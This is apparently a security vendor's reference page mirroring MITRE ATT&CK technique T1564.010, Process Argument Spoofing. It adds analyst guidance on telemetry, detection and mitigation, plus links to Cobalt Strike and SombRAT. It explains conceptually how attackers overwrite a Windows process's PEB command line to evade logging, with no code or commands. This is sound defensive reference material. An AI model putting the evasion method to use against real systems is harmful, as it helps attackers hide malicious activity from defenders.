Live Active security incident? Get immediate response
MITRE ATT&CK® Technique

T1564.010: Process Argument Spoofing

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.[1][2]

Adversaries may manipulate a process PEB to evade defenses. For example, Process Hollowing can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the Native API WriteProcessMemory() function) then resume process execution with malicious arguments.[3][2][4]

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.[5]

This behavior may also be combined with other tricks (such as Parent PID Spoofing) to manipulate or further evade process-based detections.

EnterpriseT1564.010Sub-techniqueObject v2.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

Process Argument Spoofing matters because it can make Windows process command-line evidence look benign or incomplete after a process has started. Many SOC workflows, incident timelines, and audit reconstructions rely heavily on command-line logging to explain what ran and why. If attackers can alter the process environment block memory that tools read, defenders may see one set of arguments at creation time and a different or sanitized view later.

Executive priority

Treat this as a Windows endpoint visibility and investigation-confidence issue. Leadership should ask whether security teams can preserve trustworthy process creation records, correlate them with later memory/process state, and identify cases where command-line evidence may have been manipulated. This is especially relevant for incident response readiness, managed detection quality, and control validation where process-based detections are used as evidence for ransomware or post-exploitation activity. The ATT&CK relationships to Cobalt Strike and SombRAT make this worth validating in environments that prioritize detection of post-exploitation tooling, but the supplied data does not establish current exposure or active exploitation.

Technical view

This is a Windows stealth sub-technique under Hide Artifacts. The ATT&CK description centers on manipulation of the process environment block after creation, including scenarios where a process is started with benign arguments, logged by sensors, then memory is overwritten before execution continues, or where malicious arguments are later patched to appear benign during memory review. SOC and IR teams should validate whether process creation telemetry is captured at creation time, whether later process inspections depend on mutable PEB command-line values, and whether detections account for inconsistencies involving process hollowing, Native API memory writes such as WriteProcessMemory(), and possible parent PID spoofing context. The related DET0045 detection strategy indicates there is ATT&CK detection-strategy context for this object, but the official detection field for the technique itself is not provided here.

Likely telemetry

  • Windows process creation events with original command-line arguments
  • Endpoint detection and response process start telemetry
  • Process memory inspection artifacts, especially PEB command-line values
  • API or behavioral telemetry for process memory modification such as WriteProcessMemory()
  • Suspended process creation and resume activity where available

Detection direction

  • Compare command-line values captured at process creation against later process memory or EDR-enriched command-line views where tooling supports both.
  • Tune detections for suspicious mismatch patterns rather than relying on a single command-line source as authoritative.
  • Review process hollowing and suspended-process execution analytics for cases where benign-looking command lines mask later behavior.
  • Use parent/child process lineage carefully, because the ATT&CK description notes this behavior may be combined with Parent PID Spoofing.
  • Account for false positives from legitimate software that modifies process memory or uses unusual process creation patterns; require corroborating context before escalation.

Mitigation priorities

  • Prioritize high-fidelity process creation logging on Windows so original command-line arguments are retained before later memory changes can confuse analysis.
  • Ensure EDR/SOC procedures preserve immutable event-time records and do not depend only on live process queries during investigations.
  • Correlate command-line telemetry with memory-modification behavior, process ancestry, and process injection or hollowing indicators.
  • Strengthen incident response playbooks to flag command-line inconsistencies as evidence-quality risks, not just as isolated alerts.
  • Use adversary emulation or controlled validation to confirm whether existing tools expose or miss argument spoofing behavior, without assuming vendor coverage from ATT&CK alone.
Analyst notes and limits

The supplied object has no official ATT&CK detection text, so this take focuses on validation direction derived from the description, Windows platform scope, stealth tactic, and relationships. The software relationships to Cobalt Strike and SombRAT support prioritizing this behavior in post-exploitation detection reviews, but they should not be read as proof of activity in any specific environment.

This assessment is limited to the supplied ATT&CK fields, external references, and relationships. It does not include local log sources, vendor capabilities, prevalence, active exploitation status, or organization-specific exposure. Detection feasibility depends on the exact Windows telemetry, EDR behavior, retention, and memory-analysis practices in place.

Official MITRE ATT&CK definition

Process Argument Spoofing

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.[1][2]

Adversaries may manipulate a process PEB to evade defenses. For example, Process Hollowing can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the Native API WriteProcessMemory() function) then resume process execution with malicious arguments.[3][2][4]

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.[5]

This behavior may also be combined with other tricks (such as Parent PID Spoofing) to manipulate or further evade process-based detections.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 rows
Domain ID Name Relationship / procedure
Enterprise T1564 Hide Artifacts This object subtechnique of Hide Artifacts.
Associated objects

Groups, software, and campaigns

Malware Enterprise

S0154: Cobalt Strike

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]

LinuxmacOSWindows
Relationship explorer

All related ATT&CK context

uses · Malware S0154: Cobalt Strike Enterprise uses · Malware S0615: SombRAT Enterprise subtechnique of · Technique T1564: Hide Artifacts Enterprise detects · Detection Strategy DET0045: Detection Strategy for Process Argument Spoofing on Windows Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
2.0
Created
Modified
Raw hash
789524eb03dbbfc1...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 2.0 Current bundle 789524eb03db…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Microsoft PEB 2021

    Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.

    Open source URL
  2. [2]
    Xpn Argue Like Cobalt 2019

    Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.

    Open source URL
  3. [3]
    Cobalt Strike Arguments 2019

    Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.

    Open source URL
  4. [4]
    Nviso Spoof Command Line 2020

    Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.

    Open source URL
  5. [5]
    FireEye FiveHands April 2021

    McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.

    Open source URL
  6. [6]
    mitre-attack T1564.010
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use